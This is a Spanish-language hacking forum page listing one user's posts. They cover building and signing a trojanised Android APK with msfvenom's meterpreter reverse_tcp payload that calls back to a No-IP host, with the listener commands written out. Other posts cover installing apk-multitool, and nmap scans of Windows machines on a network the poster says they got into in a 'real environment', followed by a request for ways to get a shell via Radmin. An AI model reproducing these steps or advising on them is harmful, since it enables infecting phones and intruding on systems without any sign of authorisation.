Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - binar1io

#41
Buenas Tardes compañeros tenfo el siguiente problema :

quiero usar payload de android fuera de mi red usando los siguientes aplicativos:

* mi proveedor de servicios es digitel recivido con un bam 4G LTE E3275
* msfconsole
* apk-multitool
* APP DE NO IP


realizo los siguientes pasos para la creacion de el apk infectado

msfvenom -p android/meterpreter/reverse_tcp LHOST= "HOST DE NO-IP" LPORT=1234 R > pp.apk

despues de crear la aplicacion lo procedo a firmar con apk-multitool con la opcion 4

una vez realizada la firma en la aplicacion procedo a poner a la escucha mi pp con los siguientes comandos

* set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST HOST DE NO IP
LHOST => You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > exploit


[-] Handler failed to bind to IP DE NO_IP:1234:-  -
Started reverse TCP handler on 0.0.0.0:1234
Starting the payload handler...


instalo la app y se instala correcramente sin problema alguno se inicia en segundo plano pero no me muestra la informacion en el exploit realizado

Me podrian orientar con este caso? dentro de la red si me funciona correctamente pero fuera de ella no hace nada, Muchas Gracias


#42
buenas noches Gracias por responder.

es correcto me faltaba una diagonal y adicional a eso se debe realizar de la siguiente manera para que pueda funcionar adecuadamente:

- descomprimo el  .tar en la carpeta SDK que cree con mkdir SDK
2 cd SDK/APK
3 --  chmod 755 *.sh
4 .. chmod 755 other/*.*
5  --- PATH=$PATH:/root/SDK/APK/script.sh
6-- creo otra carpeta en la carpeta SDK mkdir SDk/PLATFORM-TOOls
-7-- export PATH={PATH}:/root/sdk/APK/  *** se exporta el patch eb la misma carpeta donde esta es You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ****
8 ./script.sh

de esta manera la aplicacion instalada sin problema alguno!!

Muchas Gracias por la ayuda
#43
Buenas Noches Compañeros el dia de hoy es estado instalando la app apk-multitool y no eh podido aun estos son los pasos a seguir segun el READMEN que trae el instalador aca los pasos :

Installing APK Multi-Tool Itself
Instructions (Linux):
- Create a folder in your sdk called "APK-Multi-Tool" and put the contents of the extracted APK-Multi-Tool into it or Rename the extracted APK-Multi-Tool folder to just APK-Multi-Tool and put it into the sdk folder.
- Go to the the "sdk/APK-Multi-Tool" folder and rename "Script.sh" to "script.sh".
- Go into the "other" folder, right click on one executable file at a time, select properties, go to "permissions" in the new window and check the "allow file to be run as a program" box (do this with all the executables/.exe's).
- Open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"). Type in:
  chmod 755 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- chmod 755 all files inside other folder. (thanks for the tip bkmo  )
- Install "sox": Open the software center of the linux service and searched for sox. Once installed you will have SOX working
- To add the path to your folder open up a terminal and type in:
  sudo su
  PATH=$PATH:/THE PATH TO YOUR "SCRIPT.SH"
  (for me this looks like the following)
  PATH=$PATH:/home/username/sdk/APK-Multi-Tool
- Export PATH:Open up a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login") and type in:
  export PATH={PATH}:/PATH TO Your SDK/sdk/platform-tools/adb
  (for me this looks like the following)
  export PATH={PATH}:/home/username/sdk/platform-tools
  ("username" is the user name that appears on your computer).
- Now open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login") and type in:
  ./script.sh


Y esto es lo que yo hago:

1-- descomprimo el  .tar en la carpeta SDK que cree con mkdir SDK
2 cd SDK/APK
3 --  chmod 755 *.sh
4 .. chmod 755 other/*.*
5  --- PATH=$PATH:SDK/APK/script.sh
6-- creo otra carpeta en la carpeta SDK mkdir SDk/PLATFORM-TOOls
-7-- export PATH={PATH}:sdk/platform-tools/adb
8 ./script.sh


el abre la aplicacion pero no hace nada y cuando cierro la terminal y vuelvo a ejecutar el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login me aparece el siguiente msj:

oading defaults & preferences... Done.
Checking required binaries & files...

The program optipng is missing or is not in your PATH.

Please install it or fix your PATH variable


The program adb is missing or is not in your PATH.

Please install it or fix your PATH variable


The program aapt is missing or is not in your PATH.

Please install it or fix your PATH variable


Y no se que hacer alguien lo instalo sin problemas de antemano muchas gracias feliz noche.... ;) ;) ;) ;) ;) ;)
#44
Buenas tardes

compañero usted tiene la razon en que el puerto predeterminado es el 4899 radmin pero en este caso el puerto fue modificado para todas las pc en radmin es 2021 confirmado y estoy en un entorno real. por eso llego solo hasta aqui de aqui no se que mas hacer.
#45
 Buen Dia.

actualmente me encuentro en proceso de aprendizaje en estes mundo, y me llama mucho la atencion, compañeros, tengo una duda ya logre entrar a un espacio en la red pero cuando escaneo con nmap 2 ip me arroja es siguiente repote:

Starting Nmap 7.12 ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ) at 2016-05-13 08:42 VET
Nmap scan report for (192.168.59.000)
Host is up (0.00093s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows 98 netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 10 microsoft-ds
2021/tcp  open  servexec?
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 900-00-00-00-00-00-00-00 (Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10

Nmap scan report for (192.168.59.000)
Host is up (0.0029s latency).
Not shown: 992 filtered ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 10 microsoft-ds
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
2021/tcp open  servexec?
2701/tcp open  cmrcservice  Microsoft Configuration Manager Remote Control service (CmRcService.exe)
2869/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00-00-00-00-00-00(Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10

Service detection performed. Please report any incorrect results at You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login .
Nmap done: 2 IP addresses (2 hosts up) scanned in 80.10 seconds



en el puerto 2021 esta a la escucha para conexiones radmin yo me quisiera conectar por la shell pero no se como cuando realizo un telnet me arroja la siguiente informacion:

Trying 192.168.59.252...
Connected to 192.168.59.252.
Escape character is '^]'.
CUALQUIER COMANDO NO HACE NADA
Connection closed by foreign host.

la pregunta del millon que puedo hacer con los puertos mostrados estoy investigando, necesito de su apoyo para seguir avanzando.

de antemano muchas gracia.